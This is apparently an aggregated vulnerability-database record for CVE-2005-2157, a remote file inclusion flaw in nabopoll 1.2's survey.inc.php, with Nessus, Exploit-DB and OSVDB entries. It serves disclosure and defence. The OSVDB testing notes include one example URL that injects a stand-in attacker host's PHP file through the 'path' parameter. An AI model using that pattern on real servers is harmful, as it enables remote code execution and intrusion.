ID CVE-2005-2157 Type cve Reporter NVD Modified 2011-03-07T21:23:30
Description
PHP remote file inclusion vulnerability in survey.inc.php for nabopoll 1.2 allows remote attackers to execute arbitrary PHP code via the path parameter.
{"result": {"nessus": [{"id": "NABOPOLL_PATH_REMOTE_INCLUDES.NASL", "type": "nessus", "title": "Nabopoll survey.inc.php path Parameter Remote File Inclusion", "description": "The remote host is running nabopoll, a web-based voting / survey software for PHP and MySQL. \n\nThe installed version of nabopoll allows remote attackers to control the 'path' parameter used when including PHP code in the script 'survey.inc.php'. By leveraging this flaw, an attacker is able to view arbitrary files on the remote host and even execute arbitrary PHP code, possibly taken from third-party hosts.", "published": "2005-07-05T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=18618", "cvelist": ["CVE-2005-2157"], "lastseen": "2016-09-26T17:25:11"}], "exploitdb": [{"id": "EDB-ID:3315", "type": "exploitdb", "title": "nabopoll 1.2 survey.inc.php path Remote File Include Vulnerability", "description": "nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability. CVE-2005-2157. Webapps exploit for php platform", "published": "2007-02-15T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/3315/", "cvelist": ["CVE-2005-2157"], "lastseen": "2016-01-31T18:11:48"}], "osvdb": [{"id": "OSVDB:17706", "type": "osvdb", "title": "Nabopoll survey.inc.php path Variable Remote File Inclusion", "description": "## Vulnerability Description\nNabopoll contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to survey.inc.php not properly sanitizing user input supplied to the path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nNabopoll contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to survey.inc.php not properly sanitizing user input supplied to the path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[victim]/nabopoll/survey.inc.php?path=3Dhttp://[attacker]/test/xpl.php?cmd=3Did\n## References:\nVendor URL: http://www.nabocorp.com/nabopoll/\nSecurity Tracker: 1014355\n[Secunia Advisory ID:15910](https://secuniaresearch.flexerasoftware.com/advisories/15910/)\n[CVE-2005-2157](https://vulners.com/cve/CVE-2005-2157)\n", "published": "2005-07-01T10:16:31", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/osvdb/OSVDB:17706", "cvelist": ["CVE-2005-2157"], "lastseen": "2017-04-28T13:20:14"}]}}